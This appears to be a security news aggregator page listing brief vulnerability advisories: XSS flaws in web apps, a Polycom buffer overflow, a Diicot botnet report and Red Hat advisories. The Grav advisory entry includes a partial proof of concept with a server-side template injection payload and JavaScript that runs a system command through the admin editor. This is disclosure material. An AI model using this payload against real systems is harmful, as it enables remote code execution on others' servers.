Security
Headlines
HeadlinesLatestCVEs

Tag

#ssh

Coursela Personal Course Selling Website 1.0 Cross Site Scripting

Coursela Personal Course Selling Website version 1.0 suffers from a cross site scripting vulnerability.

Packet Storm
Open in Source
#sql#xss#vulnerability#web#auth#ssh
Coursemat Multi-Tenant Course Selling Website 1.1 Cross Site Scripting

Coursemat Multi-Tenant Course Selling Website version 1.1 suffers from a cross site scripting vulnerability.

RentEquip Multipurpose Rental 1.0 Cross Site Scripting

RentEquip Multipurpose Rental version 1.0 suffers from a cross site scripting vulnerability.

Polycom BToE Connector 4.4.0.0 Buffer Overflow / Man-In-The-Middle

Polycom BToE Connector version 4.4.0.0 suffers from remote buffer overflow and man-in-the-middle vulnerabilities.

From Cryptojacking to DDoS Attacks: Diicot Expands Tactics with Cayosin Botnet

Cybersecurity researchers have discovered previously undocumented payloads associated with a Romanian threat actor named Diicot, revealing its potential for launching distributed denial-of-service (DDoS) attacks. "The Diicot name is significant, as it's also the name of the Romanian organized crime and anti-terrorism policing unit," Cado Security said in a technical report. "In addition,

GHSA-f9jf-4cp4-4fq5: Grav Server Side Template Injection (SSTI) vulnerability

### Summary I found an RCE(Remote Code Execution) by SSTI in the admin screen. ### Details Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. ### PoC 1. Log in to the administrator screen and access the edit screen of the default page "Typography". (`http://127.0.0.1:8000/admin/pages/typography`) 2. Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed. ```js (async () => { const nonce = document.querySelector("input[name=admin-nonce]").value; const id = document.querySelector("input[name=__unique_form_id__]").value; const payload = "{{['id']|map('system')|join}}"; // SSTI Payload const params = new URLSearchParams(); params.append("task", "save"); params.append("data[header][title]", "poc"); params.append("data[content]", payload); params.append("data[folder]", "poc"); params.append("data[route]", "...

Quicklancer Freelance Marketplace 2.4 Cross Site Scripting

Quicklancer Freelance Marketplace version 2.4 suffers from a cross site scripting vulnerability.

QuickHomes Real Estate CMS 1.3 Cross Site Scripting

QuickHomes Real Estate CMS version 1.3 suffers from a cross site scripting vulnerability.

Red Hat Security Advisory 2023-3641-01

Red Hat Security Advisory 2023-3641-01 - This release of Camel for Spring Boot 3.18.3.P2 serves as a replacement for Camel for Spring Boot 3.18.3.P1 and includes bug fixes and enhancements, which are documented in the Release Notes linked in the References. Issues addressed include denial of service, deserialization, resource exhaustion, and server-side request forgery vulnerabilities.

Red Hat Security Advisory 2023-3624-01

Red Hat Security Advisory 2023-3624-01 - The Migration Toolkit for Containers enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Issues addressed include a denial of service vulnerability.